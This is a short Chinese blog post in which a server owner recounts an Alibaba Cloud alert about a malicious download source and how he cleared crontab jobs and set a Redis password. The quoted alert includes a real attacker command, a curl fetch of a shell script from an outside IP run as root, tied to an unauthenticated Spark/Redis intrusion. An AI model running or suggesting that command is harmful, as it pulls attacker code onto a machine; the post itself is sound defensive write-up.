最新发现自己的服务老是被******,服务器在访问恶意下载源。我开始没在意,后来一天一条短信,然后让我处理一下
一、问题描述
该警告引擎检测发现 主要是机器学习&深度学习引擎,大数据检测引擎。
高级威胁检测能力将持续对一段时间内的安全数据进行自动化分析,识别、挖掘潜在的高级可疑安全风险。因采用离线、异步的大数据关联分析引擎,该告警将存在一定的延时。
阿里云提示服务器访问恶意下载源(****.sp.sh)
看这种警告,其实主要看几个重点
进程异常行为-访问恶意下载源待处理高级威胁检测模型
备注处理
该告警由如下引擎检测发现:
父进程路径:/bin/bash
父进程命令行:-bash
父进程id:17635
进程id:17676
用户名:root
URL链接:http://185.92.74.42/sp.sh
进程路径:/usr/bin/curl
命令行参数:curl http://185.92.74.42/sp.sh
与该URL有关联的漏洞:Spark REST API未授权漏洞利用
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是***通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查***原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。
然后第一反应就是,这不就是定时任务 crontab 跑了个东西,可能是访问了某个链接被阿里云检测到不合法了。
然后我就开始一顿查询定时任务,然后开始清理。
查询crontab执行命令:tail -f /var/log/cron
阿里云提示服务器访问恶意下载源(****.sp.sh)
上面这个记录看着出了一些 nobody 的用户组进行了一个未知的定时任务执行记录。
然后 crontab -l 除了自己的业务定时任务并没看到这个所谓的 curl 了某个链接的定时脚本。然后我直接采取非常暴力的 rm 方法,把所有定时任务全部清除。
第二天发现没有作用 恍然大悟的我想起来测试服当时 redis 安装完确实没有怎么处理过,密码也没设置。
然后我开始设置 redis集群登陆设置密码
清空 crontab 未知的计划任务。